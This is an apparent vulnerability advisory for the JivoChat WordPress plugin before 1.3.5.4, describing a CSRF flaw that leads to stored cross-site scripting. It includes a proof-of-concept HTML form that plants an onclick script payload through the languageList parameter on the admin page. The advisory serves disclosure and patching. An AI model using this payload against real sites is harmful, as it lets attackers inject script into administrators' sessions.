WordPress Plugin Vulnerabilities
JivoChat < 1.3.5.4 - Stored Cross-Site Scripting via CSRF
Description
The plugin does not properly check CSRF tokens on POST requests to the plugins admin page, and does not sanitise some parameters, leading to a stored Cross-Site Scripting vulnerability where an attacker can trick a logged in administrator to inject arbitrary javascript.
Proof of Concept
<html> <body> <form method="POST" action="https://127.0.0.1/wordpress/wp-admin/admin.php?page=jivosite.php"> <input type="hidden" name="email" value="[email protected]"/> <input type="hidden" name="userPassword" value="Test123"/> <input type="hidden" name="userDisplayName" value="test123"/> <input type="hidden" name="languageList" value='1337" onclick=alert(/XSS/) test="'/> <input type="submit" value="Submit"> </form> </body> <html> XSS will be triggered when admin click "Go to Web Application"
Affects Plugins
Fixed in version 1.3.5.4
References
Classification
Miscellaneous
Original Researcher
muhamad hidayat
Submitter
muhamad hidayat
Submitter website
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2022-05-09 (about 4 months ago)
Added
2022-05-09 (about 4 months ago)
Last Updated
2022-05-09 (about 4 months ago)